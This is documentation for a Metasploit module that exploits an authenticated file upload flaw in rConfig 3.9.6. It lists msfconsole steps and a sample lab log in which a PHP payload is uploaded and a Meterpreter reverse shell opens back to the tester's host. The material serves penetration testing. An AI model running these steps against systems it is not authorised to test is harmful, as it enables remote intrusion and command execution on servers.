## Vulnerable Application

### Description

This module allows an attacker with a privileged rConfig account to start a reverse shell due to an
arbitrary file upload vulnerability in `/lib/crud/vendors.crud.php`. Then, the uploaded payload can be
triggered by a call to `images/vendor/<payload_file>.php`

### Installation

Vulnerable versions of rConfig can be downloaded from [here](https://www.rconfig.com/download/). Then,
help yourself with [this](https://help.rconfig.com/gettingstarted/installation) installation guide.
You can also use this [docker file](https://hub.docker.com/r/libyerman/rconfig)
(as long as it is not updated and remains a 3.9.6 version of rConfig)

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/linux/http/rconfig_vendors_auth_file_upload_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of rConfig web server is different from `/`
6. `check` to check if the targeted rConfig server is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on CentOS 7 with rConfig 3.9.6. See the following output :

```
msf6 > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set rhost 192.168.37.133
rhost => 192.168.37.133
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set username admin
username => admin
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set password admin
password => admin
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] 3.9.6 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[+] We successfully logged in !
[*] Uploading file 'oppkr.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.37.133
[+] Deleted oppkr.php
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.133:54806) at 2021-06-24 09:44:24 -0500

meterpreter > getuid
Server username: apache (48)
meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux localhost.localdomain 3.10.0-1160.31.1.el7.x86_64 #1 SMP Thu Jun 10 13:32:12 UTC 2021 x86_64
Meterpreter : php/linux
```
